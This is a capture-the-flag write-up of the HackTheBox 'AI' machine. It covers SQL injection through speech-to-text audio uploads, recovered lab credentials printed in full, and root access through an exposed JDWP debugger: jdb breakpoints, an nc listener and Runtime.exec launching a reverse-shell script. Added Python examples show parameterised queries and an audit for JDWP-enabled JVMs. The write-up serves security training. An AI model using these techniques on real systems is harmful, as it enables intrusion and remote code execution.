In this article you will learn the following:
- Scanning targets using nmap.
- Exploiting SQL injection via speech-to-text recognition.
- Enumerating the system.
- Exploiting JDWP (Java Debug Wire Protocol).
I began reconnaissance with an Nmap scan using the default scripts (-sC) and version detection (-sV) to look for vulnerabilities.
[email protected]:~/Desktop/HTB/AI# nmap -Pn -sC -sV 10.10.10.163 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 09:22 EST
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Then I ran gobuster to brute-force files and directories:
I found the following directories and files: ai.php and intelligence.php.
intelligence.php lists some commands that the API can process. ai.php has an upload form: we need to upload a .wav file, which it then processes.
There is a note in intelligence.php. The note reads: “Note: Currently our is API well familiar with Male-US mode convert test 2 speech using Text2Speech select voice : Male US”.
After playing with the sound file to look for a vulnerability in the upload functionality, I found that it is vulnerable to SQLi.
When I uploaded a wav file containing the text “Open Single Quote”, I got the following error message:
After that, I generated wav files containing the text shown below. My aim was to extract the username and password from the database.
The text “Open Single Quote or one equals one Comment Database” generated the following error:
The text “Open Single Quote order by 3 Comment Database” generated the following error:
The text “Open Single Quote order by 1 Comment Database” generated the following error:
After some time with the SQL injection, I decided to try the command “Open single quote union select space username from users Comment Database”. This retrieved the username from the database.
For the password, I used the command “Open single quote union select space password from users Comment Database”:
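The injection above works because the transcript of the uploaded audio is concatenated straight into the SQL statement. The following is an added example, not code from the writeup or from the target machine: it models a one-column chatbot lookup over a constructed in-memory SQLite database, shows the concatenated query returning a row from the users table and raising a parse error for a lone quote (the tell-tale the writeup observed), and shows the parameterised form of the same query treating the whole transcript as data. The table layout and the exact transcribed strings are assumptions.

```python
import sqlite3

# Constructed sample data (not from the target): a one-column "messages" table the
# chatbot answers from, and a "users" table holding credentials.
SAMPLE_MESSAGES = [("hello", "Hello AI!")]
SAMPLE_USERS = [("alexa", "<constructed-secret>")]


def make_db():
    """Build an in-memory SQLite database with the two constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (input TEXT, reply TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO messages VALUES (?, ?)", SAMPLE_MESSAGES)
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def vulnerable_lookup(conn, transcript):
    """String-concatenated query: the transcript becomes part of the SQL text."""
    sql = "SELECT reply FROM messages WHERE input = '" + transcript + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, transcript):
    """Parameterised query: the transcript is bound as a value, never parsed as SQL."""
    sql = "SELECT reply FROM messages WHERE input = ?"
    return [row[0] for row in conn.execute(sql, (transcript,))]


def triggers_sql_error(conn, transcript):
    """True when the concatenated query fails to parse (a single quote, for example)."""
    try:
        vulnerable_lookup(conn, transcript)
    except sqlite3.OperationalError:
        return True
    return False


def demo():
    """Run the same transcripts through both lookups and return the results."""
    conn = make_db()
    # Assumed transcription of the spoken phrase from the writeup
    # ("Open single quote union select space username from users Comment Database").
    injected = "' union select username from users -- "
    return {
        "benign_vuln": vulnerable_lookup(conn, "hello"),
        "benign_safe": safe_lookup(conn, "hello"),
        "injected_vuln": vulnerable_lookup(conn, injected),
        "injected_safe": safe_lookup(conn, injected),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
    print("lone quote errors:", triggers_sql_error(make_db(), "'"))
```

The fix is the parameterised query in safe_lookup: the transcript is passed to the driver separately from the statement, so a quote or a union in the spoken text can never change the query's structure. A speech-to-text front end is just another untrusted input source and deserves the same treatment as a form field.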
Now I have the following credentials:
• Username: alexa
• Password: H,Sq9t6}a<)?q93_
I used them to log in over SSH and got the user.txt file.
For the root part, after some enumeration, I ran the following two commands:
- ps aux | grep “root”
- netstat -ntulp
Their results were as follows:
There are ports listening on localhost only (127.0.0.1), and a Java debugger is running on port 8000, so I needed port forwarding to reach them. I used the sshuttle tool:
sshuttle -r [email protected] 127.0.0.1
OK, let me explain the exploit. I need to set a breakpoint on a method that gets called (just like setting a breakpoint while debugging a program), and then use a Java method to run a system command: java.lang.Runtime().exec("").
After some searching and enumeration, I found the method java.net.ServerSocket.accept(). This method is called whenever a new connection reaches the server, so I used a trick with nc to trigger it.
First I created a reverse shell file in /tmp/:
Then I ran the following command:
chmod +x revshell.sh
Then I set up the needed commands:
After connecting with jdb -attach 127.0.0.1:8000:
stop in java.net.ServerSocket.accept()
To hit this breakpoint I used nc 127.0.0.1 8005, or any listening port.
Run a nc listener: nc -lvnp 9090
Run: print new java.lang.Runtime().exec("/tmp/revshell.sh")
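The root step only works because a JVM was started with its JDWP debug agent enabled and the agent port was reachable once a low-privileged user had a foothold. As an added example (not from the writeup or the target), the audit below parses `ps aux` and `netstat -ntulp` style output, finds every JVM started with `-agentlib:jdwp=` or `-Xrunjdwp:`, and reports which interface its debug port is bound to. The sample output lines are constructed; the PIDs, paths and ports in them are made up.

```python
import re

# Constructed sample output in the shape of `ps aux` and `netstat -ntulp` lines.
PS_AUX = """\
root       824  0.0  4.1 2459520 83456 ?       Sl   09:20   0:03 java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 -jar /opt/app/server.jar
root       901  0.0  0.0    8100  1200 ?       S    09:20   0:00 /usr/sbin/cron
"""

NETSTAT = """\
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      824/java
tcp        0      0 127.0.0.1:8005          0.0.0.0:*               LISTEN      824/java
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      633/sshd
udp        0      0 127.0.0.53:53           0.0.0.0:*                           650/systemd-resolve
"""

# Both spellings of the debug-agent option the HotSpot JVM accepts.
JDWP_OPT = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")


def jdwp_processes(ps_text):
    """Return {pid: {option: value}} for every process started with a JDWP agent."""
    found = {}
    for line in ps_text.splitlines():
        match = JDWP_OPT.search(line)
        if not match:
            continue
        pid = int(line.split()[1])
        opts = dict(kv.split("=", 1) for kv in match.group(1).split(",") if "=" in kv)
        found[pid] = opts
    return found


def listeners(netstat_text):
    """Return [(local_ip, port, pid)] for TCP sockets in LISTEN state."""
    out = []
    for line in netstat_text.splitlines():
        parts = line.split()
        # UDP lines have no State column, so they never match here.
        if len(parts) < 7 or parts[5] != "LISTEN":
            continue
        ip, port = parts[3].rsplit(":", 1)
        pid = int(parts[6].split("/")[0]) if parts[6][0].isdigit() else None
        out.append((ip, int(port), pid))
    return out


def audit(ps_text, netstat_text):
    """Flag every JDWP-enabled JVM and say which interface its debug port is bound to."""
    findings = []
    socks = listeners(netstat_text)
    for pid, opts in jdwp_processes(ps_text).items():
        address = opts.get("address", "")
        # address may be "8000", "*:8000" or "127.0.0.1:8000"; keep the port part.
        port = int(address.rsplit(":", 1)[-1]) if address else None
        bound = [ip for ip, p, spid in socks if spid == pid and p == port]
        if not bound:
            exposure = "not listening"
        elif any(ip in ("0.0.0.0", "::") for ip in bound):
            exposure = "all interfaces"
        else:
            exposure = "loopback only"
        findings.append({"pid": pid, "port": port, "server": opts.get("server"),
                         "exposure": exposure})
    return findings


if __name__ == "__main__":
    for finding in audit(PS_AUX, NETSTAT):
        print(finding)
```

"Loopback only" is not a clean bill of health: as the writeup shows, any user who can log in to the box, or tunnel through it with sshuttle, can reach 127.0.0.1:8000 and attach jdb. Production JVMs should not carry a JDWP agent at all, and the audit's output is the list to act on.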